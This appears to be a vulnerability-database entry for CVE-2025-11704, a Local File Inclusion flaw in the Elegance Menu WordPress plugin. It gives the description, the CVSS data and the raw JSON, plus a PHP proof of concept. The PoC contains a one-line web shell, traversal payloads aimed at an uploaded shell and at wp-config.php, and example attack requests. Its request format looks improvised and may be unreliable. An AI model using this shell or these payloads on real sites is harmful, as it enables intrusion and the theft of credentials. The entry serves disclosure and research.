Security Vulnerability Report
CVE-2025-11704 CVSS 7.5 HIGH

Published: 2025-11-04 05:15:54
Last Modified: 2026-04-15 00:35:42

Description

The Elegance Menu plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.9 via the 'elegance-menu' attribute of the `elegance-menu` shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Elegance Menu plugin for WordPress <= 1.9 (all versions up to and including 1.9)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
php
<?php
// CVE-2025-11704 PoC - WordPress Elegance Menu LFI to RCE
// Author: Security Researcher
// Target: Elegance Menu Plugin <= 1.9 for WordPress

/**
 * This PoC demonstrates Local File Inclusion vulnerability in Elegance Menu plugin.
 * Attack requires Contributor-level access or higher in WordPress.
 *
 * Step 1: Upload malicious PHP file via WordPress media upload
 * Step 2: Include the uploaded file via LFI vulnerability
 * Step 3: Execute arbitrary code
 */

// Malicious PHP file content to upload (shell.php)
$malicious_code = '<?php if(isset($_GET["cmd"])) { system($_GET["cmd"]); exit; } ?>\n';

// LFI payload for shortcode
$lfi_payload = '[elegance-menu elegance-menu="../../uploads/2025/11/shell.php"]';

// Alternative: Target common WordPress files
$lfi_payload_alt = '[elegance-menu elegance-menu="../../wp-config.php"]';

// Path traversal variants
$path_traversal_variants = [
    "../../uploads/shell.php",
    "....//....//....//....//uploads/shell.php",
    "..\..\..\..\uploads\shell.php",
    "/var/www/html/wp-content/uploads/shell.php"
];

echo "[*] CVE-2025-11704 - Elegance Menu LFI to RCE PoC\n";
echo "[*] Target: WordPress with Elegance Menu Plugin <= 1.9\n";
echo "[*] Required: Contributor-level access\n\n";

// Generate HTTP request for exploitation
echo "[+] Step 1: Upload malicious PHP file via WordPress media\n";
echo "[+] Step 2: Use shortcode to include the file:\n";
echo "POST /wp-admin/admin-ajax.php HTTP/1.1\n";
echo "Host: target.com\n";
echo "Content-Type: application/x-www-form-urlencoded\n";
echo "\n";
echo "action=elegance_menu&shortcode=" . urlencode($lfi_payload) . "\n";
echo "\n[+] Step 3: Execute commands via uploaded shell:\n";
echo "GET /wp-content/uploads/shell.php?cmd=id HTTP/1.1\n";
echo "Host: target.com\n";
?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11704", "sourceIdentifier": "[email protected]", "published": "2025-11-04T05:15:53.957", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Elegance Menu plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.9 via the 'elegance-menu' attribute of the `elegance-menu` shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/elegance-menu/trunk/public/class-elegance-menu-public.php#L222", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3409312/", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/elegance-menu", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9cecce4d-5d4a-4286-97dc-88a379e21b60?source=cve", "source": "[email protected]"}]}}